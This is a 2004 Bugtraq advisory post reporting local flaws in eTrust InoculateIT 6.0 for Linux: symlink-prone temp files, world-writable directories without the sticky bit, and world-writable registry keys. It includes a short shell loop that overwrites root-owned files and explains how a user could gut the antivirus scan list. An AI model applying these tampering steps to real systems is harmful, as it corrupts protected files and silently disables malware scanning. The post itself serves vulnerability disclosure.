[local problems] eTrust Virus Protection 6.0 InoculateIT for linux

From: Rene (l0om_at_excluded.org)
Date: 02/09/04

  • Next message: Guille -bisho-: "Re: BUG IN APACHE HTTPD SERVER 2.0.47/48 (to who replied me)"
    Date: 9 Feb 2004 17:09:55 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    author: l0om <l0om@excluded.org>
    software: eTrust Virus Protection 6.0 InoculateIT for
    linux
     
    local phun with etrust antivirus 6.0 inoculateIT
    linux
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
    eTrust InnoculateIT 6.0 comes for the following OSes:
    -windows 95/98/ME
    -windows nt 4.0/2000
    -novell netware 3.x 4.x 5.x
    -lotus notes/domino
    -mircosoft exchange server
    -and finally linux (SuSE, RedHat, Caldera, Turbo
    Linux)
     
    eTrust is a antivirus program which can scan nearly
    every fileformat
    for viruses. i have installed the version for linux
    on my SuSE 9.0 system
    and noticed the following security flaws:
     
     
    1) possible symlink attacks in some scripts
     
      by the way- the env variable $CAIGLBL0000 can be /
    usr/local/eTrust/ for example.
      however - the $CAIGLGL0000/tmp IS world writable...
     
    ino/scripts/inoregupdate
    ########################
    [...]
    tfn=$CAIGLBL0000/tmp/.inoreg.ns.$$
    $NETSTAT -i 2>/dev/null | grep -v localhost > $tfn
    [...]
     
     
    scripts/uniftest
    ################
    local=$CAIGLBL0000/tmp
    local1=$CAIGLBL0000/scripts
    [...]
        $CAIGLBL0000/bin/unips > $local/unips.$$
        awk -f $local1/uniftest.awk $local/unips.$$
        st_rc=$?
        rm $local/unips.$$
    [...]
     
    scripts/unimove
    ###############
               sed -e "s!$from!$to!g" $fn > /
    tmp/.unimove.sed #<-- creats it now
               diff $fn /tmp/.unimove.sed > /dev/null
               if [ $? != 0 -a -s /tmp/.unimove.sed ];
    then
                    mv /tmp/.unimove.sed $fn
               rm /tmp/.unimove.sed # dels it if
    finished
     
     
    2) some directorys in /tmp dont have the sticky bit
    set
    an example:
     
    eTrustAE.lnx/tmp/.caipcs/ # ls -l
    drwxrwxrwx 8 root root 240 2004-02-05
    09:58 .
    drwxrwxrwx 4 root root 160 2004-02-09
    16:53 ..
    drwxrwxrwx 2 root root 48 2004-02-05
    09:54 .file
    -rw-r--r-- 1 root root 4110 2004-02-05
    09:58 ipcrm.log
    drwxrwxrwx 2 root root 856 2004-02-05
    10:48 .nob_event
    drwxrwxrwx 2 root root 1168 2004-02-05
    10:48 .nob_mutex
    drwxrwxrwx 2 root root 48 2004-02-05
    09:54 .nob_sem
    drwxrwxrwx 2 root root 384 2004-02-05
    10:48 .sem
    drwxrwxrwx 2 root root 80 2004-02-05
    10:48 .shm
     
    eTrustAE.lnx/tmp/.caipcs # ls -l .sem
    drwxrwxrwx 2 root root 384 2004-02-05
    10:48 .
    drwxrwxrwx 8 root root 240 2004-02-05
    09:58 ..
    -rw------- 1 root root 20 2004-02-05
    10:01 3571729
    -rw------- 1 root root 5 2004-02-05
    09:58 3702805
    -rw------- 1 root root 25 2004-02-05
    10:01 3735574
    -rw------- 1 root root 25 2004-02-05
    10:01 3768343
    -rw------- 1 root root 15 2004-02-05
    09:58 3801112
     
    this directory includes values which are kinda
    sensetive. so only root can
    read or write them as we can see at this
    filepermissions.
    but as the upper directory /.sem has no sticky bit
    set and is world writeable.
    we can simple overwrite these files as the directory
    permissions are of a
    higher priority as the file permissions. this is the
    truth for a handful of
    directorys.
    for example:
     
    badass~:> phun()
    {
    for i in `ls /usr/local/eTrustAE.lnx/
    tmp/.caipcs/.sem`; do
    cp -f ~/myblankass.ascii /usr/local/eTrustAE.lnx/
    tmp/.caipcs/.sem/$i
    done
    echo jupp
    }
    badass~:> phun
    jupp
    badass~:>
     
     
    3) world writeable
     
    with the linux version of etrust there come some
    directroys which we all know- the
    "registry". it seems like the whole registry key is
    world writeable:
     
    >find ./ -type f -perm -2 -print
    ./registry/hkey_current_user/software/
    computerassociates/inoculateit/6.0/local_scanner/
    macro_cure_action
    ./registry/hkey_current_user/software/
    computerassociates/inoculateit/6.0/local_scanner/
    scan_files
    ./registry/hkey_current_user/software/
    computerassociates/inoculateit/6.0/local_scanner/
    log_infected_files
    ./registry/hkey_current_user/software/
    computerassociates/inoculateit/6.0/local_scanner/
    specified_list
    ./registry/hkey_local_machine/software/
    computerassociates/scanengine/path/home
    ./registry/hkey_local_machine/software/
    computerassociates/scanengine/path/logs
    [...]
     
    they got the sticky bit set, therefore we cannot
    overwrite or delte them, but sometimes we can
    change sensetive values in the registry. for example:
     
    cat ./registry/hkey_current_user/software/
    computerassociates/inoculateit/6.0/local_scanner/
    specified_list
    |COM|DLL|DOT|DOC|EXE|SYS|VXD|XLA|XLS|XLT|XLW|RTF|WIZ|
    386|ADT|BIN|CBT|CLA|CPL|CSC|DRV|HTM|HTT|JS|MDB|MSO|
    POT|
    PPT|SCR|SHS|VBS|VSD|VST|VSS|OCX|HLP|CHM|MSI|VBE|JSE|
    PIF|BAT|
     
    this key contains a list of fileends which specifies
    what files should be scaned for a virus.
    a normal user can simply delte all values except one
    from this list, and can make the scanner pretty
    lame...
    furthermore there are worldwritable keys like
    "windows/currentversion", with keys which include the
    path to
    the normal binarys ("/usr/bin"). it may be possible
    to execute whatever you want on a reboot if you
    change
    the right keys in the right way.
     
     
     
    have phun!
            feel phree!
                    life phat!
     
    YaCP - (Y)ast (a)nother (C)yber(P)unk
     
    --l0om
    --www.excluded.org
     
     


  • Next message: Guille -bisho-: "Re: BUG IN APACHE HTTPD SERVER 2.0.47/48 (to who replied me)"